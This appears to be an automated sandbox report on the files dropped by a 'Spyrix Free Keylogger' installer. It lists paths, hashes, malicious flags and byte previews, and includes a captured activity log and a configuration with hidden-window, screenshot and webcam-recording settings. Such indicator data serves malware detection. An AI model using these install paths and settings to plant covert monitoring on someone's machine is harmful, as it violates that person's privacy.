                                                                                                                                                                                                                                                          Preview:GIF89aG.9...............g.............r...w................m.............$.....Z...ud.........|..............-(.......M5o...................h.............6{...........yu6.............w.83.........L.....>..d.........U....m...mj.......eYY~.k..{.............................w........c....................!r............p........W.........E.....ZU.......j.................................b.....Qw..D@.N......L.z......F.A...........|..N......f.............x.........].......UQ.........................................`.....?%.w.#Y....BBB...fff............000...TTT888.....xxx.ZD.....................b.....>j....Iq...................................................@l.......~........Q..U..............4c.........._......OM.................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.4065994592116873
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:4nISm6zYtefo8+9n8Qm8NUF8hxR8Y8Y82KIl:uzmIeefw9PmKx7l
                                                                                                                                                                                                                                                          MD5:8CD9FC7BAA20456A91F3AC4DCEB36D1C
                                                                                                                                                                                                                                                          SHA1:B40529BB8752FACB6C2BA3421FDE5670A45D58E3
                                                                                                                                                                                                                                                          SHA-256:B9E55A391E3C165DE3B3D08C49C7695B350623E37DD71A5A051D90A027939710
                                                                                                                                                                                                                                                          SHA-512:B271657DE4EB639C92877C3C83C0F67254A32D0BCEB48999EABDD9095D5B1804B946E4FDEA217E7BE0F7D1877AA0F9CA7AFEE69576AC9962AFBCFAECDFD1B14F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..................................................................................................................j...d...d...j..............................................d...p...........p...d...~...............................s...d.........................c...q..........................d.................................d......................q...t...................................y...l...................d...................d...~...................d...................d...v...u...d...d...........................d...................d...d...i..................................d...................d...................................d...d...d...................d.......................k...d...p..........d...................d..........................................d...................d...........................................d...................d...........................................d.......................n...........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231577 bytes, 377142\37\user, C:\ProgramData\Security Monitor\{827D21CC-
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):231577
                                                                                                                                                                                                                                                          Entropy (8bit):4.057271368152214
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:FcNhK3S7si3SboaS4bP682UJFudWXBZNRkRrz//7LXA6vTLLzLTDhbzDDLZ3HEIF:YhYi3SboaSYPrJDZfNG
                                                                                                                                                                                                                                                          MD5:2D90D0E4F4B90E68484FDA633EC4E244
                                                                                                                                                                                                                                                          SHA1:1962E45EAFEF98C4F8649D305492207607ED1DC4
                                                                                                                                                                                                                                                          SHA-256:85D4960E97D52161092FEAB100FF3D27CFA930A674D841C512703CB56926B56B
                                                                                                                                                                                                                                                          SHA-512:3455E970433AF714DB44845C3C71352810EBFC9C406C314AFA0C37632FFFED53CB6D7AEC82C7593CC2CDBF64EFA339E25D1340EDD146A414732620751D58D96A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Inno Setup Uninstall Log (b)....................................Spyrix Free Keylogger...........................................................................................................Spyrix Free Keylogger 11.6.22...............................................................................................................%..........................................................................................................................C(<................3.7.7.1.4.2......f.r.o.n.t.d.e.s.k..t...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}................:...].. .....r....hK..IFPS....d.......A.......................................................................................................................................................BOOLEAN...................................................!............"........#................"........%........&.................... ...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1308909
                                                                                                                                                                                                                                                          Entropy (8bit):6.226978823759581
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:8tdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt54DTx9KJ:kqTytRFk6ek14hk
                                                                                                                                                                                                                                                          MD5:E7AB51FCD6A4B56B17A6D7019743346A
                                                                                                                                                                                                                                                          SHA1:0AC79F07195B6D6C25D64864C762E5910D8DC52F
                                                                                                                                                                                                                                                          SHA-256:3BA57A14C77AD692AD21D6502ED32A9FFD1E23CF908F70A4E3E13635DEBED246
                                                                                                                                                                                                                                                          SHA-512:1F2CAA370B45ACCEF65E1863EEC48D02395349D44FDED44E9FE3652F5CDA05A3DC271295550EC9905826F964D20E9774793DACA0937F5D79308154E060AFD808
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@..........................p............@......@..............................@8...0...2................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc....2...0...4...l..............@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38533120
                                                                                                                                                                                                                                                          Entropy (8bit):6.659117982180381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:393216:lw4FxslQp+QsIjKvL/RouclpOaPdvmtzzGnDHmgRBbxr5U0zvOaHxA2KZc4P9QpC:lw4fslOPKVouExr5U0zGaHxAJkuC+d7
                                                                                                                                                                                                                                                          MD5:63C6697F6F8C4DE12A18633A65A6DD50
                                                                                                                                                                                                                                                          SHA1:442715CE26B000A34E25DBE9BED05863C2488096
                                                                                                                                                                                                                                                          SHA-256:2E92C42276AEA8D407AE41B3D8B63E6C39F33EC8D1CEEB4C632B54073B56BDA3
                                                                                                                                                                                                                                                          SHA-512:50B6035BA8C2B4F871CD2CEF057A4CF21433999E6EBC2566DD92843D4F3DFFEF00198FA80F3D34424FAF049BEAFAFA637DB1FD061251A7D10FC82735E0313A92
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................&...>J.............P....@..........................P........L...@... ......................0..G........C...........................p..(...........................L-.......................................................text...h...........................`..`.rodata.L..........................`.``.rotext..............t.............. .P`.data...|U...P...V...*..............@.p..rdata...k.......k.................@..@.bss........@2.......................`..edata..G....0........2.............@.0@.idata...C.......D....A.............@.0..CRT....4....P........B.............@.0..tls.........`........B.............@.0..reloc..(....p........B.............@.0B........................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):364
                                                                                                                                                                                                                                                          Entropy (8bit):5.43067451073694
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:S6mx2ecz09LRBAW39A92SBa7ab7QGSaAV8av8KdfW0BSFgivFIHB92SBaJFfflBb:Hmg7KlBAt92r747pejv5DidIh92rLfzb
                                                                                                                                                                                                                                                          MD5:BC0C6F9A08389679167D8E537BB24643
                                                                                                                                                                                                                                                          SHA1:0044BB9A1E4A16FB6A822ADCB355C8BA55988110
                                                                                                                                                                                                                                                          SHA-256:97F2CE9A0490BACBB57715609ACFA51F730D33ECB60F081D4F151B8DACA4B68E
                                                                                                                                                                                                                                                          SHA-512:4223FB1CAD4FE561CFDC548F1920AD5688D8A984CD62B6AEEBB221CB3CBBA98FB7D8926E50B33AA59FA9BA36F561779F2220DBFA509ABB462531ED5F3ED2818F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.DAYLY LOG..ACTIVITY;45567.0823329282;;;ID: 51 Start of User Session;user..APP;45567.0824649653;chrome.exe;Dashboard - Google Chrome;;user..PRG_RUN;45567.0824649653;chrome.exe;Google Chrome;C:\Program Files\Google\Chrome\Application\chrome.exe;user..SCREENSHOT;45567.0825089236;chrome.exe;Dashboard - Google Chrome;ID: 31 Window Change;user..
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3013000, file counter 6, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                          Entropy (8bit):0.8995106558114013
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:TLyeEu/2vjGIaidxC5Z7U1hssjR+FpukXE:T5Eu/2vjSMC5Z7UEsFqpF0
                                                                                                                                                                                                                                                          MD5:77909FAF27C49C07F8811697FE91EBAD
                                                                                                                                                                                                                                                          SHA1:20D222DA013BED78929350218D712DA4C7E5DFC1
                                                                                                                                                                                                                                                          SHA-256:37C194A729984FA4D099B060A602C3763B29E334ADF87DCB57D9DC7F38C4A2AA
                                                                                                                                                                                                                                                          SHA-512:17EEDFF21985BB71327D43A4A8CE11AE5625330F9B9F43DBD5535BD80C270D15CF5DC88382B8EC61ECF1792072300AC5F54D4473B004A11D255DF53921168472
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .........................................................................-.............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):16928
                                                                                                                                                                                                                                                          Entropy (8bit):0.7383921554934452
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:7+tFXlC5Z7U1hssjR+7/3MOqLCeEu/2vjGI7R:7MF1C5Z7UEsFu3JqJEu/2vjDR
                                                                                                                                                                                                                                                          MD5:65D5BFC7D08C12B03A934CBC5B8A8855
                                                                                                                                                                                                                                                          SHA1:7D4FA3CABB9F0912747C274845FFAC9E22256E8D
                                                                                                                                                                                                                                                          SHA-256:1B1DC4818E18158C4C264926653E877612BF06F96FDD3FCEA39C53B88E38E974
                                                                                                                                                                                                                                                          SHA-512:65145F7FD46CCD036E80B71AD9CE038CFEB3FF5C5E9F6B42817EEB1F72655D0B86575FA8D0E24CD528B0215F3D1591824D8AAF92EA68D4E5815B307171FCD118
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.... .c......"g.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):93
                                                                                                                                                                                                                                                          Entropy (8bit):4.598990500829375
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:DpRRLCBxr5BnWyCCBxrlBQUrdA7TA:UB/p4CBx0TA
                                                                                                                                                                                                                                                          MD5:AA87F68C2B3373604DA36DE0520F7669
                                                                                                                                                                                                                                                          SHA1:7F6CAB6C98B6EFEA4C39FE31DF5206DFD5242BA2
                                                                                                                                                                                                                                                          SHA-256:D28EBC2BF21063B1DC6C7779D8C691D84B99B8FDFB46A8B9884CA0D2522F86B4
                                                                                                                                                                                                                                                          SHA-512:19C7B36AEE6E8899FE883442A919BEC09521FE1B079C982DACE5AABAFA230EA80CD940B7E73D8BD8547EA6B22CAF1D65A0FD75C00860820E59437C700FBF88D0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Logs]..FirstLogName=45567.log..AllSize=0..LastLogName=45567.log..CLog=45567.log..CSize=364..
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 891x487, components 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24145
                                                                                                                                                                                                                                                          Entropy (8bit):7.442729337620717
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:0ZCCCPmB3/ssssssssg9sahaWpYn6oCY18OYav2B8zVVg5i63i5W:0p3/ssssssss+sacWe6La6YsMU
                                                                                                                                                                                                                                                          MD5:B3D3192682E66A8EE2C2248B70F1C660
                                                                                                                                                                                                                                                          SHA1:A23E0783F3B9B57A27FAC00E2B862F04504AE011
                                                                                                                                                                                                                                                          SHA-256:DBF2A92D6E26133ACA0BDD87FAF676D7BA1AE6E50772A333479677D62774CD06
                                                                                                                                                                                                                                                          SHA-512:4C943059211664180C1DF8F3033F44F7D68449D26CEEB8B77C273263A0F3F2DB1D15A554B3F225326868A3BFE5266D6996213FFEC0DEAD834D968E7F7F3C737A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:......JFIF.............C.(..#..(#!#-+(0<dA<77<{X]Id.......................................C.+--<5<vAAv..............................................................{.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..ws...($..\......zG..|..........J......H....4b..........#.....?........zG..|..(...?....?.F'.........jJ(.<O..=#.......................H....4b..........#.....?........zG..|..(...?....?.F'.........jJ(.<O..=#.......................H....4b..........#.....?........zG..|..(...?....?.F'.........jJ(.<O..=#.......................H....4b..........#.....?........z
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):23
                                                                                                                                                                                                                                                          Entropy (8bit):3.969001629875993
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:ELW12f/2ovn:110nvn
                                                                                                                                                                                                                                                          MD5:17A21C80F565AC198D750ED357CFF38A
                                                                                                                                                                                                                                                          SHA1:2C7DAAAC660B5B159A293D5104A4FC9DA5F107CB
                                                                                                                                                                                                                                                          SHA-256:16F8E499A198F095851E5CC1E5A4AB5A5F0218517BB4491A2EEB270926FC2940
                                                                                                                                                                                                                                                          SHA-512:CC74C171D6186E5956C8200CB41A1FE07BA3C7BA197F96833BED77F965DB044FCE38CC85115B3A36BD7450B3E50D4758FC40DC1AD7E972B53F4144379B04751C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Screens]..Size=24145..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 04:58:16 2024, mtime=Wed Oct 2 04:58:25 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2100
                                                                                                                                                                                                                                                          Entropy (8bit):3.671043864277925
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:8JAmtl37DQj+mj9k+mE9k+m9kWNH+m98pJpt:8ptuj+wk+Hk+yt+n/
                                                                                                                                                                                                                                                          MD5:A976A95FBDAF98F2465821E1CDDFF387
                                                                                                                                                                                                                                                          SHA1:21610B437C687F9AA480865B69983D990E1A63B7
                                                                                                                                                                                                                                                          SHA-256:621453DABD1FC91735CB572F862412F95FE46473FF2620859402E0F9A47B5B51
                                                                                                                                                                                                                                                          SHA-512:A8196411F38DA128583003EAE741E805E11115949EA37C194252C7970E418DADC7E988BA2DB24BA31B9C1993B54EC1E648BA56FD34F68B68FBE3EC5990A36B21
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ..Z.......V.N...............Q..........................P.O. .:i.....+00.../C:\...................`.1.....BYH/. PROGRA~3..H......O.IBYH/....g.......................:.P.r.o.g.r.a.m.D.a.t.a.....j.1.....BYH/. SECURI~1..R......BYH/BYH/....,.......................:.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.......1.....BYM/. {827D2~1..~......BYH/BYM/....;.....................u.q.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.....Z.2...Q.7Y.. spkl.exe..B......BYI/BYI/..............................s.p.k.l...e.x.e.......~...............-.......}....................C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe..I.....\.....\.....\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.\.s.p.k.l...e.x.e.F.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.O.C.:.\.P.r.o.g.r
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [System]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1897
                                                                                                                                                                                                                                                          Entropy (8bit):5.273000805303813
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:HG9ahTrnsv/iSiYymZDiSiYPZCZr4sP5vluoLa37ap1ZCZr4AyPp4L5fDiHwl:HG9G2xjCZMsP5v9aKCZMAh7iHA
                                                                                                                                                                                                                                                          MD5:EE77554A67677FE493156F87506DA787
                                                                                                                                                                                                                                                          SHA1:4A9148F1CC538B24BE4714DD67899690166962C7
                                                                                                                                                                                                                                                          SHA-256:08BFE0DE2787C1DE5E65EFA0F9FEEA01E7A7A086F8DC2BD0FB2724DF1AF799C9
                                                                                                                                                                                                                                                          SHA-512:986DC376AEF086DAD310E6ED7F9EA96C32D4167C3C0FCAD517C348E1CE83C431C5ED4FDCD3C7A3022BA94827B16657162FB13A21A902FFB5F165C65FEC98CA46
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Interface]..lngfile=english.lng..skinfile=Default.skn..[System]..Run1=0..hide=0..prg_ver=11.6.22..tid=-1..lt=..Users=Administrator,DefaultAccount,user,Guest,jones,WDAGUtilityAccount..AllUsers=Administrator,DefaultAccount,user,Guest,jones,WDAGUtilityAccount..mstatus=1..KDelay=5..hide_p=0..hotkeyid=0..runcmd=runkey..LocalSave=0..[WEBDelivery]..preg=..comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625..wsa=7B42C3A0C386750D76C29FC3862A..Enable=0..User=..Password=PIH:..Interval=5..[SnapShot]..AllWebCams=-=First Active WebCam=-..jsAllWebCams=["-=First Active WebCam=-"]..atDrive=1..atPrinterJob=1..atStart=0..atActivity=0..atTimer=0..atLevel=0..Level=50..Interval=10..WebCam=..[VideoRec]..AllWebCams=-=First Active WebCam=-..jsAllWebCams=["-=First Active WebCam=-"]..atStart=0..StartDuration=0.5..atActivity=0..ActivityDuration=0.5..atTimer=0..Interval=30..IntervalDuration=0.5..atLevel=0..Level=30..LevelDuration=0.5..WebCam=..[Window]..Top=50..Left=50..Width=1280..Height=620..Bot
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90361
                                                                                                                                                                                                                                                          Entropy (8bit):7.9769989580983625
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:Zy6BW/LDE6LyfJVEr+jMi2hm9YFrRUv9Ie2eIDtTER:M6eL46LCJVpCsy6IAIRe
                                                                                                                                                                                                                                                          MD5:3475836FCF6BBE603D1E83DD8A3C4765
                                                                                                                                                                                                                                                          SHA1:DD92253B2600C1612FDC657FFB41E4FD66352C6B
                                                                                                                                                                                                                                                          SHA-256:F8E582779693B4DAB740E13721093D9B8EB69DC0FF5CFACB5208C04321BA37F8
                                                                                                                                                                                                                                                          SHA-512:8AE5E48692962A7F8049521F3B3510F1F1B9EF7CAF4A40526D7D6286BBEB647CFA54D88AF9A8E03AD884A42AECBA677E0A229577A394CD228CDF98E0F99506E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at..........u.J................i]OOH..........mQ...K2..C$..............B*.p..X...dH....V<........M........%#"...........z.....[&....x8#.........`..............,$.....}}}.._...d0......Hw.hih...L..............xK..q..v.............e(......~......`.z`..........g.;".......t..........Y....r+.....q....xd...........R...........ad\.......WA......a...Y).R......3... .....]CHA6.......n............z ....a<..2.*b...................L0....%+...nst]cc......lnk..M..x....QD.....&........Y..;........syu^^X......~..........fnr..e..xL..................U.hV....`..j................D....g..R....^.....<5.vqCCC..84/..2..5../..;.....&....L%.r+...........).....................................................W..V.......v............R......WYW....?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7609
                                                                                                                                                                                                                                                          Entropy (8bit):7.838852889190603
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CRjl+OutIyaaHKip9QY5Lg6pWlicYMG5/b:OshLaIFUug6pGzo
                                                                                                                                                                                                                                                          MD5:359D85C48DCA7C9C529A7EC0F4D30DC4
                                                                                                                                                                                                                                                          SHA1:749EE1A5C90299C9360DD3131222CE92584FFCC2
                                                                                                                                                                                                                                                          SHA-256:03BBB9C7C115C8FD5E2FB573B86687AE27672C7F8B970FB9661E5007FC6E42BE
                                                                                                                                                                                                                                                          SHA-512:9494049C968B6BEE93090630086EB4D8129B48E5E6CBA3CF2E7EEF2114948316D0068F859594EA3A464AB2FE99510C1C94EEF786A933114C0CFC630C13435B1D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9....Gq.....$...Z...ud.........|.........,&..........M5.................g.........................yv.....6.............v.72......g.L........C.................T.......m...kg.......eX...X}.k..{................s.......{..........................................n...................C......ZU..................................................`......D@.M........z........F..........|..a....................i........................s.......UQ...............................4c...................?%....w.#Y.BBB.........000.........fff.....888TTTxxx.ZD..........................d.........................................................................r..*]....Q.....U..~............OM.......................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                                                                                          File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2094
                                                                                                                                                                                                                                                          Entropy (8bit):3.7428199944490896
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:tKleUhKVfcfSOMokHSOMSd2gianNHMSOMadjHMSOMadvAcdqcTc20rIO:Sh0UKTyVgiaNJCjJCvzdNoNIO
                                                                                                                                                                                                                                                          MD5:46C57123EA845B9C434E3780790BF1D9
                                                                                                                                                                                                                                                          SHA1:67D34740AF9F23D412DFCEAA0C3B3C47FAB7246F
                                                                                                                                                                                                                                                          SHA-256:ACD9E07556289AB118D4B6B23D704F2E98FCE1852020B536FFD8CDBFEB656222
                                                                                                                                                                                                                                                          SHA-512:1B2CFF63B4691DAFD83A321B0A41185B10352FF31B1DCF0493A6BBC2DDED2DE89221CB049D723E29C1E9DA2077459FD557C173CF840D9D8CE147223CD31F36CC
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Reputation:unknown
